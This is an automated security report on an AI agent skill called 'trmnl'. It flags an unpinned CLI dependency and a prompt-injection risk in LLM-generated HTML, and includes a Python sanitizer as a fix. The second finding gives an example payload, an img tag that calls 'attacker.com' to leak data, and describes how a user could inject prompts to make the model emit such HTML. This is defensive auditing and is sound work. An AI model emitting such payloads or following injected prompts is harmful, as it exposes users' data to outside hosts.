Trust Assessment
trmnl received a trust score of 74/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 0 critical, 2 high, 0 medium, and 0 low severity. Key findings include an unpinned `trmnl-cli` dependency and LLM-generated HTML content that can be exploited via prompt injection.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (2)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | **Unpinned `trmnl-cli` dependency.** The skill instructs the agent to install `trmnl-cli@latest` globally. Using `@latest` means any new version, including a potentially malicious one, could be installed without explicit review. This is a significant supply-chain risk: a compromised version of the `trmnl-cli` package could lead to arbitrary code execution or data exfiltration on the host system. *Remediation:* pin `trmnl-cli` to a specific, known-good version (e.g., `npm install -g trmnl-cli@1.2.3`) to prevent automatic updates to compromised versions, and re-verify the package's integrity before updating the pin. | LLM | SKILL.md:10 |
| HIGH | **LLM-generated HTML content can be exploited via prompt injection.** The skill instructs the LLM to generate HTML from user input, which is then written to `/tmp/trmnl-content.html` and processed by the `trmnl` CLI. A malicious user could craft a prompt that manipulates the LLM into emitting HTML containing arbitrary JavaScript, external resource fetches (e.g., `<img src="http://attacker.com/leak?data=...">`), or other malicious constructs. If the `trmnl` CLI or the e-ink display device processes this HTML without sufficient sanitization (e.g., a CLI preview function that renders HTML in a browser, or a device that fetches external resources), this could lead to data exfiltration (IP address, user agent, or other accessible data) or, in the worst case, command injection if the HTML parser is vulnerable. Although the skill instructs the LLM to use "TRMNL framework classes", prompt injection can bypass such constraints. *Remediation:* (1) **Strict input validation/sanitization:** sanitize all LLM-generated HTML before writing it to a file or passing it to the `trmnl` CLI, stripping `<script>` tags and `on*` attributes and validating URLs in `src`/`href` attributes against a whitelist. (2) **Confine LLM output:** use stronger prompt-engineering techniques (few-shot examples, XML/JSON output constraints) to restrict output to the allowed TRMNL framework classes and attributes. (3) **Sandbox execution:** if the CLI or device renders HTML in a browser-like environment, sandbox it heavily to block script execution, network access, and local file access. (4) **Least privilege:** run the `trmnl` CLI with the minimum necessary permissions. | LLM | SKILL.md:33 |
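The sanitization step recommended in the second finding (stripping `<script>` tags and `on*` attributes, and whitelisting `src`/`href` URLs) can be sketched with Python's standard-library HTML parser. This is a minimal illustration, not a production sanitizer; the `ALLOWED_HOSTS` set and function names are assumptions, not part of the skill or the `trmnl` CLI:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical whitelist of hosts the generated HTML may reference.
ALLOWED_HOSTS = {"usetrmnl.com"}

class TemplateSanitizer(HTMLParser):
    """Rebuilds HTML while dropping <script>/<style> blocks,
    on* event-handler attributes, and non-whitelisted URLs."""

    def __init__(self):
        super().__init__()
        self.out = []
        self._skip_depth = 0  # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if self._skip_depth:
            return
        kept = []
        for name, value in attrs:
            if name.lower().startswith("on"):
                continue  # drop inline event handlers
            if name.lower() in ("src", "href"):
                u = urlparse(value or "")
                # Reject non-https schemes (e.g. javascript:) and unknown hosts.
                if u.scheme not in ("", "https") or \
                        (u.netloc and u.netloc not in ALLOWED_HOSTS):
                    continue
            kept.append(f'{name}="{value}"' if value is not None else name)
        attr_str = (" " + " ".join(kept)) if kept else ""
        self.out.append(f"<{tag}{attr_str}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if not self._skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(data)

def sanitize(html: str) -> str:
    s = TemplateSanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out)
```

For example, `sanitize('<p onclick="x()">hi</p>')` keeps the `<p>` element and its text while discarding the `onclick` handler. A real deployment would also need to re-escape attribute values and handle malformed markup defensively.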
Full report: https://skillshield.io/report/6423b4961a20bda7